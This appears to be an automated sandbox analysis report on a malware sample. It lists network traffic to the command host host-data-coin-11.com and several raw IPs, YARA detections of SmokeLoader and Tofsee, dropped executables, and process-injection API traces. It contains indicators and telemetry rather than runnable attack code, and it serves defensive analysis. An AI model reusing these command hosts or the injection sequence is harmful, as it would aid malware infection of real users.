                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c7 d7 10 56 3d 42 a6 fe c2 aa b9 01 ac 52 cc 77 f8 55 4d 84 4b f4 f1 2c 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OV=BRwUMK,0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d7 8c 08 04 64 1f 0d 0a 30 0d 0a 0d 0a Data Ascii: 19I:82Od0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f cf 86 52 15 62 10 e5 e8 83 a0 ad 0d 0a 30 0d 0a 0d 0a Data Ascii: 1eI:82ORb0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f cf 86 52 15 62 10 e5 e8 83 a0 ad 0d 0a 30 0d 0a 0d 0a Data Ascii: 1eI:82ORb0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4c e5 ae 8e 70 bc 57 dd 43 d4 f8 21 86 24 e8 c3 96 57 2e e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9LpWC!$W.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:34:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mnxwgte.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: host-data-coin-11.com
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.5:49841 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.15:443 -> 192.168.2.5:49842 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.5:49851 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.5:49852 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.5:49855 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.5:49856 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49864 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49866 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.240.190.72:443 -> 192.168.2.5:49882 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 178.248.232.78:443 -> 192.168.2.5:49887 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 178.248.232.78:443 -> 192.168.2.5:49889 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 116.202.14.219:443 -> 192.168.2.5:49894 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 51.91.13.105:443 -> 192.168.2.5:49895 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 1.2.nkINykHreE.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.haifbcd.4715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.1.nkINykHreE.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.1.haifbcd.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nkINykHreE.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.115B.exe.4715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.1.115B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.haifbcd.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.115B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000000.282842442.0000000003A61000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.370053936.0000000000751000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.352429754.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.297306514.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.444174815.0000000000951000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.352266837.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.297326406.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.370019662.0000000000620000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.442728079.0000000000630000.00000004.00000001.sdmp, type: MEMORY
                      Source: 115B.exe, 0000000E.00000002.341864344.00000000006BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 18.2.18D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.svchost.exe.2bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.600000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.600000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.18D.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.3.sdiimdop.exe.570000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.18D.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.18D.exe.560000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.svchost.exe.2bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001F.00000002.396765412.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.390911110.0000000000540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.395236716.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.550647204.0000000002BB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.396983806.0000000000600000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.396894340.0000000000540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.390725871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.369452134.0000000000560000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 18D.exe PID: 4992, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: sdiimdop.exe PID: 4560, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5180, type: MEMORYSTR

                      System Summary:

                      barindex
                      PE file has nameless sectionsShow sources
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 4BED.exe.3.drStatic PE information: section name:
                      Source: 4BED.exe.3.drStatic PE information: section name:
                      Source: 4BED.exe.3.drStatic PE information: section name:
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00436950
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00435B70
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_005431FF
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00543253
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_00402A5F
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_00402AB3
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_1_00402A5F
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_1_00402B2E
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 13_2_00473253
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 13_2_004731FF
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 14_2_00473253
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 14_2_004731FF
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 14_2_006C1004
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_00402A5F
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_00402AB3
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_1_00402A5F
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_1_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 16_2_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 16_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 16_1_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 16_1_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_004027CA
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_00401FF1
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_0040158E
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_004015A6
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_004015BC
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_00436340
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_00435560
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00435940
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00436720
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_030395F0
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_03030464
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_03030470
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_030BDC78
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_030B8C08
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_030B8C18
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_030B847B
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_05681410
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_05684FF8
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_05680040
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_05682A48
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: 31_2_0040C913
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: 31_2_00435940
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: 31_2_00436720
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: nkINykHreE.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: nkINykHreE.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: nkINykHreE.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: nkINykHreE.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 115B.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 115B.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 115B.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 115B.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2997.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2997.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2757.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4187.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4187.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 13E0.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 13E0.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 1B15.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 1B15.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 1B15.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 1B15.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 28C2.exe.3.drStatic PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
                      Source: 28C2.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4583.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4BED.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4BED.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4BED.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 18D.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 18D.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 18D.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 18D.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: haifbcd.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: haifbcd.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: haifbcd.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: haifbcd.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: scifbcd.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: scifbcd.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: sdiimdop.exe.18.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: sdiimdop.exe.18.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: sdiimdop.exe.18.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: sdiimdop.exe.18.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeSection loaded: mscorjit.dll
                      Source: nkINykHreE.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: String function: 0040EE2A appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: String function: 00402544 appears 53 times
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: String function: 00542794 appears 35 times
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: String function: 00422420 appears 157 times
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: String function: 00422260 appears 114 times
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: String function: 0042CE40 appears 36 times
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: String function: 00422600 appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: String function: 00422440 appears 57 times
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00540110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_00402491 NtOpenKey,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
